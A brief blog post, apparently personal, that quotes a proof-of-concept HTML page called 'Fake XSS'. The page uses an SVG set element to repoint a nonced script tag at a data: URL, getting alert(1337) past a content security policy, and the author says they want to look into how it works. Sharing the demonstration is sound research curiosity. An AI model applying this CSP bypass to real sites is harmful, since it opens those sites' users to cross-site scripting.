XSS??
2017. 2. 16. 02:14
```html
<html>
<head>
<meta http-equiv=content-security-policy content="object-src 'none';script-src 'nonce-random-secret'">
<title> Fake XSS </title> </head>
<body><!--xss xss xss-->
<svg><set href=#script attributeName=href to=data:,alert(1337) />
<!--/xss xss xss-->
<footer>blablabla</footer><script id=script src=bla nonce=random-secret></script>
</body>
</html>
```
김용진 posted this on Facebook, and the code is fascinating... I'll have to look into what it is.
http://sirdarckcat.github.io/csp/fakexss.html